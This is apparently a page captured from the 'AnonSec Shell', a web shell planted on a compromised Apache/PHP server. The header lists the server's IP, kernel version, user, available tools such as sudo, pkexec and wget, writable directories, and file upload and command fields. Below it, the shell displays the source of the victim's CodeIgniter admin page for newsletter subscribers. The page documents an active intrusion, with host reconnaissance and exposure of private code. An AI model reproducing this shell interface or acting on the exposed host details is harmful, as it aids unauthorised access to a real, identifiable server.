AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_projetos/sopizzas/application/views/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_projetos/sopizzas/application/views/superadmin/newsletter_subscriber_list.php
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<section class="content-header">
<h1><?php echo $this->lang->line('NewsletterSubscriber');?></h1>
<?php if($this->session->flashdata('success_msg')) { ?>
    <div class="alert alert-info text-center">
      <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
      <strong><?php echo $this->session->flashdata('success_msg'); ?></strong> 
    </div>
<?php } ?>
<?php if(validation_errors() != FALSE) { ?>
    <div class="alert alert-danger text-center">
      <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
      <strong><?php echo validation_errors(); ?></strong> 
    </div>
<?php } ?>
</section>
<!-- Main content -->
<section class="content">
<div class="nav-tabs-custom">
<div class="tab-content no-padding">
	<div id="home" class="tab-pane fade in active">
		<div class="box-body mctop30">
			<div class="col-md-12 col-xs-12">
				<div class="col-md-2 custom-padding-0">
					<label style="float: left; margin-top: 6px;"><?php echo $this->lang->line('Show');?></label>
					<div class="input-group col-md-8" style="padding-left: 6px;">
						<select id="per_page" onchange="getData('0',$('#myFilter1').val(),this.value)" class="fs_input select2">
                          <option value="5" <?=ROW_PER_PAGE==5?'selected':''?> >5</option><option value="10" <?=ROW_PER_PAGE==10?'selected':''?> >10</option><option value="15" <?=ROW_PER_PAGE==15?'selected':''?> >15</option><option value="20" <?=ROW_PER_PAGE==20?'selected':''?> >20</option>
                  </select>
						<span class="input-group-addon" style="padding: 6px 4px;"><?php echo $this->lang->line('Page');?></span>
					</div>
				</div>
                <?php //echo $this->lang->line('EmailDescTETS');
                //print_r($this->lang->line("SubscriberTypeASC"));
                ?>
				<div class="col-md-5 col-sm-12 col-xs-12 margintop10 paddingright0">
					<div class="form-group">
						<select id="myFilter1" onchange="getData('0',this.value,$('#per_page').val())" class="form-control select2">
							<option value="99"><?php echo $this->lang->line('Sort_By');?></option>
							<option value="3"><?php echo $this->lang->line('SubscriberEmailASC');?></option>
							<option value="4"><?php echo $this->lang->line('SubscriberEmailDESC');?></option>
                            <option value="6"><?php echo $this->lang->line('SubscriberTypeASC');?></option>
							<option value="7"><?php echo $this->lang->line('SubscriberTypeDESC');?></option>
						</select>
					</div>
				</div>
				<div class="col-md-5 col-sm-5 col-xs-12 margintop10 text-right">
					<button onclick="do_export();" class="btn btn-sm btn-success filter-submit"><i class="fa fa-file-pdf-o"></i> <?php echo $this->lang->line('Export_CSV');?></button>
				</div>
			</div>
			<div class="box-body" id="customers">
				<div class="clearfix"></div>
				<div class="table-responsive" id="postList">
					<?php $this->load->view('superadmin/newsletter_subscriber_list_ajax'); ?>
				</div>
				<!-- /.table-responsive -->
			</div>
		</div>
	</div>  
</div>
</div>

<!-- ./tab section -->
<div class="clearfix"></div>
</section>
<!-- /.content -->
</div>

<script>
function do_export(){
	var action = $('#myFilter1').val();
    window.location='<?php echo base_url(); ?>dashboard/newsletter_subscriber_export/'+action;
} 

</script>

Anon7 - 2022
AnonSec Team